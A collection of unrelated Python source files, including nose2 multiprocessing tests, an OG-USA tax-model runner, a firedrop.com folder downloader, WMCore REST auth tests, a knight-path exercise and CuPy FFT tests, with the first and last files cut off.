flat = list(self.plugin._flatten(suite))
self.assertEqual(len(flat), 3)
def test_flatten_nested_suites(self):
sys.path.append(support_file('scenario/slow'))
import test_slow as mod
suite = unittest.TestSuite()
suite.addTest(mod.TestSlow('test_ok'))
suite.addTest(mod.TestSlow('test_fail'))
suite.addTest(mod.TestSlow('test_err'))
suite2 = unittest.TestSuite()
suite2.addTest(suite)
flat = list(self.plugin._flatten(suite2))
self.assertEqual(len(flat), 3)
def test_flatten_respects_module_fixtures(self):
sys.path.append(support_file('scenario/module_fixtures'))
import test_mf_testcase as mod
suite = unittest.TestSuite()
suite.addTest(mod.Test('test_1'))
suite.addTest(mod.Test('test_2'))
flat = list(self.plugin._flatten(suite))
self.assertEqual(flat, ['test_mf_testcase'])
def test_flatten_respects_class_fixtures(self):
sys.path.append(support_file('scenario/class_fixtures'))
import test_cf_testcase as mod
suite = unittest.TestSuite()
suite.addTest(mod.Test('test_1'))
suite.addTest(mod.Test('test_2'))
suite.addTest(mod.Test2('test_1'))
suite.addTest(mod.Test2('test_2'))
suite.addTest(mod.Test3('test_3'))
flat = list(self.plugin._flatten(suite))
self.assertEqual(flat, ['test_cf_testcase.Test2.test_1',
'test_cf_testcase.Test2.test_2',
'test_cf_testcase.Test',
'test_cf_testcase.Test3',
])
def test_conn_prep(self):
self.plugin.bind_host = None
(parent_conn, child_conn) = self.plugin._prepConns()
(parent_pipe, child_pipe) = multiprocessing.Pipe()
self.assertIsInstance(parent_conn, type(parent_pipe))
self.assertIsInstance(child_conn, type(child_pipe))
self.plugin.bind_host = "127.0.0.1"
self.plugin.bind_port = 0
(parent_conn, child_conn) = self.plugin._prepConns()
self.assertIsInstance(parent_conn, connection.Listener)
self.assertIsInstance(child_conn, tuple)
self.assertEqual(parent_conn.address, child_conn[:2])
def test_conn_accept(self):
(parent_conn, child_conn) = multiprocessing.Pipe()
self.assertEqual(self.plugin._acceptConns(parent_conn), parent_conn)
listener = connection.Listener(('127.0.0.1', 0))
with self.assertRaises(RuntimeError):
self.plugin._acceptConns(listener)
def fake_client(address):
client = connection.Client(address)
time.sleep(10)
client.close()
t = threading.Thread(target=fake_client, args=(listener.address,))
t.start()
conn = self.plugin._acceptConns(listener)
self.assertTrue(hasattr(conn, "send"))
self.assertTrue(hasattr(conn, "recv"))
class TestProcserver(FunctionalTestCase):
def setUp(self):
super(TestProcserver, self).setUp()
self.session = session.Session()
def test_dispatch_tests_receive_events(self):
ssn = {
'config': self.session.config,
'verbosity': 1,
'startDir': support_file('scenario/tests_in_package'),
'topLevelDir': support_file('scenario/tests_in_package'),
'logLevel': 100,
'pluginClasses': [discovery.DiscoveryLoader,
testcases.TestCaseLoader,
buffer.OutputBufferPlugin]
}
conn = Conn(['pkg1.test.test_things.SomeTests.test_ok',
'pkg1.test.test_things.SomeTests.test_failed'])
procserver(ssn, conn)
# check conn calls
expect = [('pkg1.test.test_things.SomeTests.test_ok',
[('startTest', {}),
('setTestOutcome', {'outcome': 'passed'}),
('testOutcome', {'outcome': 'passed'}),
('stopTest', {})]
),
('pkg1.test.test_things.SomeTests.test_failed',
[('startTest', {}),
('setTestOutcome', {
'outcome': 'failed',
'expected': False,
'metadata': {'stdout': '-------------------- >> begin captured stdout << ---------------------\nHello stdout\n\n--------------------- >> end captured stdout << ----------------------'}}),
('testOutcome', {
'outcome': 'failed',
'expected': False,
'metadata': {'stdout': '-------------------- >> begin captured stdout << ---------------------\nHello stdout\n\n--------------------- >> end captured stdout << ----------------------'}}),
('stopTest', {})]
),
]
for val in conn.sent:
if val is None:
break
test, events = val
exp_test, exp_events = expect.pop(0)
self.assertEqual(test, exp_test)
for method, event in events:
exp_meth, exp_attr = exp_events.pop(0)
self.assertEqual(method, exp_meth)
for attr, val in exp_attr.items():
self.assertEqual(getattr(event, attr), val)
class MPPluginTestRuns(FunctionalTestCase):
def test_tests_in_package(self):
proc = self.runIn(
'scenario/tests_in_package',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 25 tests')
self.assertEqual(proc.poll(), 1)
def test_package_in_lib(self):
proc = self.runIn(
'scenario/package_in_lib',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 3 tests')
self.assertEqual(proc.poll(), 1)
def test_module_fixtures(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 5 tests')
self.assertEqual(proc.poll(), 0)
def test_class_fixtures(self):
proc = self.runIn(
'scenario/class_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 7 tests')
self.assertEqual(proc.poll(), 0)
def test_large_number_of_tests_stresstest(self):
proc = self.runIn(
'scenario/many_tests',
'-v',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.loader.generators',
'-N=1')
self.assertTestRunOutputMatches(proc, stderr='Ran 600 tests')
self.assertEqual(proc.poll(), 0)
def test_socket_stresstest(self):
proc = self.runIn(
'scenario/many_tests_socket',
'-v',
'-c scenario/many_test_socket/nose2.cfg',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.loader.generators',
'-N=1')
self.assertTestRunOutputMatches(proc, stderr='Ran 600 tests')
self.assertEqual(proc.poll(), 0)
def test_too_many_procs(self):
        # Just need to run the mp plugin with fewer tests than
        # processes.
proc = self.runModuleAsMain('scenario/one_test/tests.py',
'--log-level=debug',
'--plugin=nose2.plugins.mp',
'-N=2')
ret_vals = queue.Queue()
def save_return():
"""
            Popen.communicate() blocks. Use a thread-safe queue
to return any exceptions. Ideally, this completes
and returns None.
"""
try:
self.assertTestRunOutputMatches(proc,
stderr='Ran 1 test')
self.assertEqual(proc.poll(), 0)
ret_vals.put(None)
except Exception as exc:
ret_vals.put(exc)
thread = threading.Thread(target=save_return)
thread.start()
        # 1 minute should be more than sufficient for this
# little test case.
try:
exc = ret_vals.get(True, 60)
except queue.Empty:
exc = "MP Test timed out"
proc.kill()
self.assertIsNone(exc, str(exc))
def test_with_output_buffer(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.buffer',
'-N=2',
'-B',
)
self.assertTestRunOutputMatches(proc, stderr='Ran 5 tests')
self.assertEqual(proc.poll(), 0)
def test_unknown_module(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2',
'-B',
'does.not.exists.module',
'does.not.exists.module2'
)
expected_results = (
r"does\.not\.exists\.module2 (\S+) \.\.\. ERROR\n"
r"does\.not\.exists\.module (\S+) \.\.\. ERROR"
)
self.assertTestRunOutputMatches(proc, stderr=expected_results)
self.assertEqual(proc.poll(), 1)
|
run_ogusa.py
|
import ogusa
import os
import sys
from multiprocessing import Process
import time
#OGUSA_PATH = os.environ.get("OGUSA_PATH", "../../ospc-dynamic/dynamic/Python")
#sys.path.append(OGUSA_PATH)
from ogusa.scripts import postprocess
#from execute import runner # change here for small jobs
from ogusa.scripts.execute_large import runner
from ogusa.utils import REFORM_DIR, BASELINE_DIR
def run_micro_macro(user_params):
reform = {
2015: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
}, }
start_time = time.time()
output_base = REFORM_DIR
input_dir = REFORM_DIR
kwargs={'output_base':output_base, 'input_dir':input_dir,
'baseline':False, 'analytical_mtrs':False, 'reform':reform,
'user_params':user_params,'guid':'42', 'run_micro':False}
p1 = Process(target=runner, kwargs=kwargs)
p1.start()
#runner(**kwargs)
# output_base = BASELINE_DIR
# input_dir = BASELINE_DIR
# kwargs={'output_base':output_base, 'input_dir':input_dir,
# 'baseline':True, 'analytical_mtrs':True, 'user_params':user_params,
# 'guid':'42','run_micro':False}
# p2 = Process(target=runner, kwargs=kwargs)
# p2.start()
# p1.join()
# print "just joined"
# p2.join()
# time.sleep(0.5)
# ans = postprocess.create_diff(baseline=BASELINE_DIR, policy=REFORM_DIR)
# print "total time was ", (time.time() - start_time)
# print ans
# return ans
if __name__ == "__main__":
run_micro_macro(user_params={})
|
firedrop_script.py
|
import urllib2
import mechanize
from bs4 import BeautifulSoup
import cookielib
import time
import re
import requests
from requests import Request, Session
from tqdm import tqdm
from threading import Thread
import Queue
import argparse
def run(enter_url,enter_filename,enter_pw):
print 'Welcome to firedrop file getter'
print '--------------------------------'
scrape_pages(enter_url,enter_filename,enter_pw)
def scrape_pages(enter_url,enter_filename,enter_pw):
#setup our instance variables.
cj = cookielib.CookieJar()
br = mechanize.Browser()
br.set_cookiejar(cj)
#browser methods (we get input from user input)
#note br.form is coupled to firedrop.com
br.open(enter_url)
br.select_form(nr=0)
br.form['folderPassword'] = enter_pw
br.submit()
    #read the initial 'link page' and copy the response (this is the page with all the download links).
first_resp = br.response().read()
soup = BeautifulSoup(first_resp, 'html.parser')
#a quick little password check that checks the response page for the given filename text
if enter_filename not in soup.text:
print '---Sorry, Incorrect Password. Quiting...'
raise SystemExit
else:
print '---Password Successful!'
mainpage_links = []
mainpage_links_name = []
for link in soup.find_all('a',href=True):
if enter_filename in link.text:
print 'Copying mainpage link...',link
mainpage_links.append(link['href'])
mainpage_links_name.append(link.text)
print 'Copying mainpage links complete!'
#then we open an individual link (which takes us to the download page of that file).
#note: this is done once. Basically first we parse the main page for links,
#then we open every mainlink to get the actual file link, but we don't download yet.
download_urls = []
print 'Opening mainpage links and finding file download URLs...'
for page in mainpage_links:
#here we need to parse the final dl page for the actual file url.
download_page = urllib2.urlopen(page)
new_soup = BeautifulSoup(download_page.read(), 'html.parser')
script = new_soup.find_all('script')
script_bit = ''
for item in script:
if 'Download File' in item.text:
script_bit = item.text
pattern = re.compile("(\w+)='(.*?)'")
fields = dict(re.findall(pattern, script_bit))
print 'Copying file download URL...',fields['href']
#append the actual download file url to a list.
download_urls.append(fields['href'])
thread_queue(download_urls, mainpage_links_name)
def download(i,q,counter, file):
while True:
print '%s: Looking at next URL...' % i
url = q.get()
print '%s: Downloading:' % i, url
#download
file_name = file[counter]
counter += 1
#first HTTP request.
res = requests.get(url,stream=False)
#get header/cookie info.
#decouple this later.
pattern = re.compile("(\w+)")
fields = re.findall(pattern, url)
short_url = 'https://firedrop.com/' + fields[3]
cookie = res.headers['Set-Cookie']
#post second HTTP request with cookie stuff.
#this is a custom request so that firedrop will serve the file.
s = Session()
req = Request('POST',url)
prepped = s.prepare_request(req)
prepped.headers['Host'] = 'firedrop.com'
prepped.headers['Connection'] = 'Keep-Alive'
prepped.headers['Accept-Encoding'] = 'gzip, deflate, sdch'
prepped.headers['Accept'] = '*/*'
prepped.headers['Upgrade-Insecure-Requests'] = '1'
prepped.headers['DNT'] = '1'
prepped.headers['Referer'] = short_url
prepped.headers['Cookie'] = cookie + ';, jstree_open=%23-1;, jstree_load=;, jstree_select=%233530'
#note this timer is vital (response.js will not serve file without the delay)
print 'Preparing file download... (Takes 10sec)'
time.sleep(10)
#download - GET second HTTP response.
file_resp = s.send(prepped, stream=True)
#write file.
#problem here for large files, this needs to be iter_content or else it won't DL.
print '---Downloading file: ', file_name
with open(file_name,'wb') as code:
for data in tqdm(file_resp.iter_content(512)):
code.write(data)
q.task_done()
def thread_queue(download_urls, mainpage_links_name):
#setup our queue.
#multithread option.
num_threads = 1
enclosed_q = Queue.Queue()
counter = 0
for i in range(num_threads):
dae = Thread(target=download, args=(i, enclosed_q, counter, mainpage_links_name))
dae.setDaemon(True)
dae.start()
for url in download_urls:
enclosed_q.put(url)
enclosed_q.join()
print '\n---------- DONE ----------'
if __name__ == "__main__":
# Setup args.
parser = argparse.ArgumentParser()
parser.add_argument('url',help='The main firedrop folder URL')
parser.add_argument('filename',help='Part of the actual filename(s) of files you want to download')
parser.add_argument('password',help='The folder password')
args = parser.parse_args()
run(args.url,args.filename,args.password)
|
Simple_t.py
|
# system modules
import cherrypy
from cheroot.test import webtest
from cherrypy import expose
from multiprocessing import Process
# WMCore modules
from WMCore.REST.Auth import user_info_from_headers
from WMCore.REST.Test import setup_dummy_server, fake_authz_headers
from WMCore.REST.Test import fake_authz_key_file
from WMCore.REST.Tools import tools
FAKE_FILE = fake_authz_key_file()
PORT = 8888
class Root:
def __init__(self, *args):
pass
@expose
def default(self):
return "foo"
@expose
@tools.cms_auth(role = "Global Admin", group = "global")
def global_admin(self):
return "ok"
class SimpleTest(webtest.WebCase):
def setUp(self):
self.h = fake_authz_headers(FAKE_FILE.data)
self.hglobal = fake_authz_headers(FAKE_FILE.data, roles = {"Global Admin": {'group': ['global']}})
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
stop_server(self.proc, self.engine)
def test_basic_fail(self):
self.getPage("/test")
self.assertStatus("403 Forbidden")
def test_basic_success(self):
self.getPage("/test", headers = self.h)
self.assertStatus("200 OK")
self.assertBody("foo")
def test_auth_fail(self):
self.getPage("/test/global_admin", headers = self.h)
self.assertStatus("403 Forbidden")
def test_auth_success(self):
self.getPage("/test/global_admin", headers = self.hglobal)
self.assertStatus("200 OK")
self.assertBody("ok")
class AuthTest(webtest.WebCase, cherrypy.Tool):
def setUp(self):
cherrypy.Tool.__init__(self, 'before_request_body', user_info_from_headers, priority=60)
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
print("teardown")
stop_server(self.proc, self.engine)
def testAuth(self):
myHeaders = [('cms-authn-name', 'Blah'), ('cms-auth-status', 'OK'),
('cms-authn-login', 'blah'), ('cms-authn-hmac', '1234')]
self.getPage("/test", headers=myHeaders)
self.assertTrue(True) # Do not remove this line! otherwise the test hangs
def setup_server():
srcfile = __file__.split("/")[-1].split(".py")[0]
setup_dummy_server(srcfile, "Root", authz_key_file=FAKE_FILE, port=PORT)
def load_server(engine):
setup_server()
proc = Process(target=start_server, name="cherrypy_Api_t", args=(engine,))
proc.start()
proc.join(timeout=1)
return proc
def start_server(engine):
webtest.WebCase.PORT = PORT
cherrypy.log.screen = True
engine.start()
engine.block()
def stop_server(proc, engine):
cherrypy.log.screen = True
engine.stop()
proc.terminate()
if __name__ == '__main__':
webtest.main()
|
lab12_d.py
|
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():
def cover():
nonlocal i, j
while i >= 0 and j >= 0 and j < m:
moves = 0
for step in [[1, -2], [-2, 1], [-1, -2], [-2, -1]]:
di, dj = step[0] + i, step[1] + j
if di in range(n) and dj in range(m) and matrix[di][dj] > 0:
moves += matrix[di][dj]
matrix[i][j] += moves
i -= 1
j += 1
file_input, file_output = open('knight2.in', 'r'), open('knight2.out','w')
n, m = map(int, file_input.readline().split())
matrix = [[0] * m for _ in range(n)]
matrix[0][0] = 1
for diff in range(n):
i, j = diff, 0
cover()
for diff in range(1, m):
i, j = n - 1, diff
cover()
print(matrix[-1][-1], file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
test_fft.py
|
import functools
import numpy as np
import pytest
import cupy
from cupy.fft import config
from cupy.fft._fft import (_default_fft_func, _fft, _fftn,
_size_last_transform_axis)
from cupy import testing
from cupy.testing._loops import _wraps_partial
@pytest.fixture
def skip_forward_backward(request):
if request.instance.norm in ('backward', 'forward'):
if not (np.lib.NumpyVersion(np.__version__) >= '1.20.0'):
pytest.skip('forward/backward is supported by NumPy 1.20+')
def nd_planning_states(states=[True, False], name='enable_nd'):
    """Decorator for parameterized tests with and without nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
        name(str): Argument name to which the current planning state is passed.
    This decorator adds a keyword argument specified by ``name``
    to the test fixture. Then, it runs the fixture repeatedly,
    passing each element of ``states`` to the named
    argument.
"""
def decorator(impl):
@_wraps_partial(impl, name)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
def multi_gpu_config(gpu_configs=None):
"""Decorator for parameterized tests with different GPU configurations.
Args:
gpu_configs (list of list): The GPUs to test.
    .. note::
        The decorated tests are skipped if fewer than two GPUs are available.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
use_multi_gpus = config.use_multi_gpus
_devices = config._devices
try:
for gpus in gpu_configs:
try:
nGPUs = len(gpus)
assert nGPUs >= 2, 'Must use at least two gpus'
config.use_multi_gpus = True
config.set_cufft_gpus(gpus)
self.gpus = gpus
impl(self, *args, **kw)
except Exception:
print('GPU config is:', gpus)
raise
finally:
config.use_multi_gpus = use_multi_gpus
config._devices = _devices
del self.gpus
return test_func
return decorator
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(0,), (10, 0), (10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestFft:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
    # NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(0, 10), (10, 0, 10), (10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
class TestFftOrder:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
# See #3757 and NVIDIA internal ticket 3093094
def _skip_multi_gpu_bug(shape, gpus):
# avoid CUDA 11.0 (will be fixed by CUDA 11.2) bug triggered by
# - batch = 1
# - gpus = [1, 0]
if (11000 <= cupy.cuda.runtime.runtimeGetVersion() < 11020
and len(shape) == 1
and gpus == [1, 0]):
pytest.skip('avoid CUDA 11 bug')
# Almost identical to the TestFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 0, 64],
'shape': [(0,), (0, 10), (64,), (4, 64)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuFft:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
    # NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
# Almost identical to the TestFftOrder class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuFftOrder:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@testing.gpu
class TestDefaultPlanType:
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd cuFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
# TODO(leofang): test newer ROCm versions
if axes == (0, 1) and cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
# for rfftn
ca = cupy.random.random((4, 2, 6))
for s, axes in zip([(3, 4), None, (8, 7, 5)],
[(-2, -1), (0, 1), None]):
fft_func = _default_fft_func(ca, s=s, axes=axes, value_type='R2C')
if enable_nd:
# TODO(leofang): test newer ROCm versions
if axes == (0, 1) and cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# nd plan not possible if last axis is not 0 or ndim-1
assert _default_fft_func(ca, axes=(2, 1), value_type='R2C') is _fft
# for irfftn
ca = cupy.random.random((4, 2, 6)).astype(cupy.complex128)
for s, axes in zip([(3, 4), None, (8, 7, 5)],
[(-2, -1), (0, 1), None]):
fft_func = _default_fft_func(ca, s=s, axes=axes, value_type='C2R')
if enable_nd:
# To get around hipFFT's bug, we don't use PlanNd for C2R
# TODO(leofang): test newer ROCm versions
if cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# nd plan not possible if last axis is not 0 or ndim-1
assert _default_fft_func(ca, axes=(2, 1), value_type='C2R') is _fft
@pytest.mark.skipif(10010 <= cupy.cuda.runtime.runtimeGetVersion() <= 11010,
reason='avoid a cuFFT bug (cupy/cupy#3777)')
@testing.gpu
@testing.slow
class TestFftAllocate:
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
# Clean up FFT plan cache
cupy.fft.config.clear_plan_cache()
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
{'shape': (3, 4), 's': (0, 5), 'axes': None},
{'shape': (3, 4), 's': (1, 0), 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFft2:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft2(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft2(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': [-1, -2]},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': ()},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFftn:
@nd_planning_states()
@testing.for_orders('CF')
